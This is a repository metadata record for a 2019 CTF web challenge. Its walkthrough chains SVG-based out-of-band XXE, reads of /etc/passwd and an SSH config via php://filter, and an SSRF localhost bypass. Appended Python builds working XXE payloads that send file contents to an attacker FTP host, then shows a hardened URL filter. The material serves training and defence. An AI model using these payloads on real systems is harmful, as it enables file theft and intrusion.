{"id":18688787,"url":"https://github.com/noraj/sigsegv2.webserver_11","last_synced_at":"2025-11-08T04:30:29.774Z","repository":{"id":55307910,"uuid":"225728296","full_name":"noraj/SigSegV2.webserver_11","owner":"noraj","description":"A web challenge that was available during SigSegV2 CTF (2019)","archived":false,"fork":false,"pushed_at":"2021-01-05T17:28:39.000Z","size":390,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-12-28T01:26:28.004Z","etag":null,"topics":["bypass","challenge","ctf","php","rtfm","sigsegv2","ssrf","svg","web","xxe"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/noraj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-12-03T22:18:41.000Z","updated_at":"2024-01-17T17:51:42.000Z","dependencies_parsed_at":"2022-08-14T20:22:11.803Z","dependency_job_id":null,"html_url":"https://github.com/noraj/SigSegV2.webserver_11","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FSigSegV2.webserver_11/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/noraj","download_url":"https://codeload.github.com/
noraj/SigSegV2.webserver_11/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239549138,"owners_count":19657534,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","challenge","ctf","php","rtfm","sigsegv2","ssrf","svg","web","xxe"],"created_at":"2024-11-07T10:38:22.067Z","updated_at":"2025-11-08T04:30:29.746Z","avatar_url":"https://github.com/noraj.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XXE OOB via SVG + SSRF network scan + SSRF localhost bypass\n\n## Version\n\nDate        | Author                  | Contact               | Version | Comment\n---         | ---                     | ---                   | ---     | ---\n03/11/2019  | noraj (Alexandre ZANNI) | noraj#0833 on discord | 1.0     | Document creation\n\nInformation displayed for CTF players:\n\n+ **Name of the challenge** / **Nom du challenge**: `Image Checker 2`\n+ **Category** / **Catégorie**: `Web`\n+ **Internet**: not needed\n+ **Difficulty** / **Difficulté**: Very difficult / très difficile\n\n### Description\n\n```\nnoraj is hiding something...\n\nFlag format: sigsegv{flag}\n\nauthor: [noraj](https://pwn.by/noraj/)\n```\n\n### Hints\n\n- Hint1: SVG\n- Hint2: XXE\n- Hint3: SSRF\n- Hint4: SSH (user) config\n\n## Integration\n\nThis challenge requires a Docker Engine and Docker Compose.\n\nBuilds, (re)creates, starts, and attaches to containers for a service:\n\n```\n$ docker-compose up --build\n```\n\nAdd `-d` if you want to run the container detached.\n\n## Solving\n\n### Author solution\n\nMore 
hardcore version of *Image Checker 1*, so the first steps are the same, but this\ntime the flag is not simply hidden in `/etc/passwd` but on a remote service.\n\n1. The app asks for an SVG.\n2. Other file types seem to be refused.\n3. Let's pick a legit SVG and send it to see what happens. Alternatively, just load `view.php` without a parameter.\n4. The app seems to parse info from the file.\n5. Since SVG is XML, let's try an XXE attack.\n6. We can't see any errors (the injection is blind), so let's try an out-of-band (OOB) XXE.\n7. Let's start an HTTP server to deliver the payloads (`xxe.svg` \u0026 `xxe.xml`) and...\n8. ... let's start an FTP OOB extraction receiver ([xxeserv](https://github.com/staaldraad/xxeserv)); its `-w`/`-wd`/`-wp` flags also serve the payload directory over HTTP on port 8080, so one process covers both steps:\n    ```\n    ./xxeserv -p 2121 -w -wd /home/noraj/dir/ -wp 8080\n    ```\n9. Send the payload: http://x.x.x.x:42421/view.php?svg=http://192.168.1.84:8080/xxe.svg (see `xxe.svg` \u0026 `xxe.xml`).\n10. Read `/etc/passwd`: the home of the user `noraj` is `/home/noraj/`. Change the `data` payload in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=/etc/passwd\n    ```\n11. Let's try to find juicy files like `.bash_history`, `.profile`, etc. The only one which exists is `/home/noraj/.ssh/config`. Change the `data` payload in `xxe.xml` to:\n    ```\n    php://filter/convert.base64-encode/resource=/home/noraj/.ssh/config\n    ```\n12. The SSH config file leaks the `hiddenservice` domain name.\n13. Then brute-force ports to find the one where a service is listening: http://hiddenservice:9999 (see the brute-force script `bf_ports.rb`, with an in-depth explanation in its comments).\n14. We have to request http://127.0.0.1:10000, but that host and port are blocked, so we have to bypass the filter.\n15. Do an SSRF bypass. 
Change the `data` payload in `xxe.xml` from the blocked direct request:\n    ```\n    php://filter/convert.base64-encode/resource=http://hiddenservice:9999?url=http://127.0.0.1:10000\n    ```\n    to the bypass form found by fuzzing (note the `%23`, which the hidden service decodes to `#` when it reads its `url` parameter):\n    ```\n    php://filter/convert.base64-encode/resource=http://hiddenservice:9999/?url=http://127.0.0.1:10000%23@google.com:80/\n    ```\n\nSee the fuzzer PoC I created to find this SSRF bypass: https://gitlab.com/snippets/1911694\n\n## Flag\n\n`sigsegv{so_y0u_ar3_r3a11y_s3eri0us_4bout_XXE_4nd_SSRF}`\n\n## SigSegV2\n\nA web challenge that was available during SigSegV2 CTF (2019).\n\n1 team out of 36 flagged this challenge.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fsigsegv2.webserver_11/lists"}
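Steps 7 to 11 of the author solution above rely on `xxe.svg` and `xxe.xml`, which this page does not reproduce. The following Python is an added example, not the author's files or the challenge repository's code: it builds the standard two-stage out-of-band XXE payload the walkthrough describes (an SVG whose DOCTYPE pulls an external DTD, and a DTD that reads the target through `php://filter` and ships the base64 to the xxeserv FTP listener as a path), and decodes what that listener logs. The attacker host `192.168.1.84` and ports 8080/2121 come from the writeup; the DTD layout is the generic technique and is assumed to match what the author used; the sample base64 blob is constructed here.

```python
import base64

# Values from the writeup: the attacker's host and the ports handed to
# xxeserv (-wp 8080 for the payload HTTP server, -p 2121 for the FTP receiver).
ATTACKER_HOST = "192.168.1.84"
HTTP_PORT = 8080
FTP_PORT = 2121


def build_svg(dtd_url):
    """Stage 1 (xxe.svg): a valid SVG whose DOCTYPE loads an external DTD.

    The body is a real SVG so the app's type check passes.  The parameter
    entity %dtd; makes the XML parser fetch dtd_url and evaluate it, and
    &exfil; (declared by that DTD) is what fires the out-of-band request.
    """
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE svg [\n"
        f'  <!ENTITY % dtd SYSTEM "{dtd_url}">\n'
        "  %dtd;\n"
        "]>\n"
        '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">\n'
        '  <text x="0" y="12">&exfil;</text>\n'
        "</svg>\n"
    )


def build_dtd(resource, ftp_host=ATTACKER_HOST, ftp_port=FTP_PORT):
    """Stage 2 (xxe.xml): the external DTD that reads `resource` and leaks it.

    %data; holds the base64 of the target (php://filter keeps newlines,
    slashes and binary out of the URL built below).  %param1; declares a
    general entity whose SYSTEM id is an FTP URL with that base64 as the
    path.  A parameter-entity reference inside an entity value is only legal
    in an *external* subset, which is why this lives in a second file.  When
    the SVG expands &exfil;, the parser connects to ftp_host:ftp_port and the
    receiver sees the file content in the path it is asked for.
    """
    data_url = f"php://filter/convert.base64-encode/resource={resource}"
    return (
        f'<!ENTITY % data SYSTEM "{data_url}">\n'
        f"<!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'ftp://{ftp_host}:{ftp_port}/%data;'>\">\n"
        "%param1;\n"
    )


def build_view_url(target_base, svg_url):
    """Step 9: the request that makes the app fetch and parse our SVG."""
    return f"{target_base}/view.php?svg={svg_url}"


def decode_exfil(ftp_path):
    """Turn the base64 the FTP receiver logs as a path back into the file.

    The receiver may strip the trailing '=' padding; restore it before
    decoding so files whose length is not a multiple of three still decode.
    """
    b64 = ftp_path.strip("/")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


if __name__ == "__main__":
    dtd_url = f"http://{ATTACKER_HOST}:{HTTP_PORT}/xxe.xml"
    print(build_svg(dtd_url))
    print(build_dtd("/home/noraj/.ssh/config"))
    print(build_view_url("http://x.x.x.x:42421", f"http://{ATTACKER_HOST}:{HTTP_PORT}/xxe.svg"))
    # Constructed sample of what the receiver would log for the first line of /etc/passwd.
    print(decode_exfil("/cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo"))
```

Swapping the `resource` argument is all that changes between steps 10, 11 and 15: a local path, then the `http://hiddenservice:9999/?url=...` SSRF URL, are both just strings the PHP stream wrapper resolves on the target.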
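The step 15 bypass only works because the hidden service's filter and the HTTP client it hands the URL to disagree about which host the URL names. The page does not show that filter, so the following Python is an added example, not the challenge's code: it models a hypothetical string-based deny-list check of the kind the `%23@google.com:80/` suffix defeats (it takes whatever follows the last `@` as the authority), contrasts it with a check built on a real URL parser plus a loopback/private-range test, and shows the target a standards-following client actually connects to. `BLOCKED_HOSTS`, `BLOCKED_PORTS` and the `naive_is_allowed` logic are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumed deny-list; the real hidden service's rules are not on the page.
BLOCKED_HOSTS = {"127.0.0.1", "localhost"}
BLOCKED_PORTS = {10000}

# The url= value as it travels inside the outer php://filter URL ...
BYPASS_ENCODED = "http://127.0.0.1:10000%23@google.com:80/"
# ... and as the hidden service sees it once the query parameter is decoded.
BYPASS = unquote(BYPASS_ENCODED)  # http://127.0.0.1:10000#@google.com:80/


def naive_is_allowed(url):
    """Hypothetical string-based filter (an assumption, not the challenge's code).

    It drops the scheme, cuts at the first '/', then treats everything after
    the last '@' as host:port so that user:pass@ prefixes are skipped.  The
    payload plants '#@google.com:80' before any '/', so this check inspects
    google.com:80 and never sees 127.0.0.1:10000.
    """
    rest = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url, flags=re.IGNORECASE)
    authority = rest.split("/", 1)[0].rsplit("@", 1)[-1]
    host, _, port = authority.partition(":")
    port_num = int(port) if port.isdigit() else 80
    return host not in BLOCKED_HOSTS and port_num not in BLOCKED_PORTS


def effective_target(url):
    """Host and port a standards-following HTTP client actually connects to.

    The fragment ('#...') is never sent on the wire, so the client uses the
    authority that precedes it: 127.0.0.1:10000 for the bypass payload.
    Returns (host, None) when the port is not a valid number.
    """
    parts = urlsplit(url)
    try:
        port = parts.port
    except ValueError:
        return parts.hostname, None
    return parts.hostname, port or (443 if parts.scheme == "https" else 80)


def parser_is_allowed(url):
    """Hardened check: decide on what the client will use, not on the raw string."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host, port = effective_target(url)
    if not host or port is None or host in BLOCKED_HOSTS or port in BLOCKED_PORTS:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A hostname: a complete fix also resolves it, re-checks the address
        # and pins it for the request, so DNS rebinding cannot undo the check.
        return True
    return not (ip.is_loopback or ip.is_private or ip.is_link_local)


if __name__ == "__main__":
    for url in ("http://127.0.0.1:10000/", BYPASS, "http://hiddenservice:9999/"):
        print(f"{url:42} naive={naive_is_allowed(url)!s:5} "
              f"parser={parser_is_allowed(url)!s:5} target={effective_target(url)}")
```

The defensive takeaway is the last function: validate the parsed host and port that the client library will use, reject loopback and private ranges by address rather than by string, and resolve-and-pin hostnames, instead of pattern-matching the text of the URL.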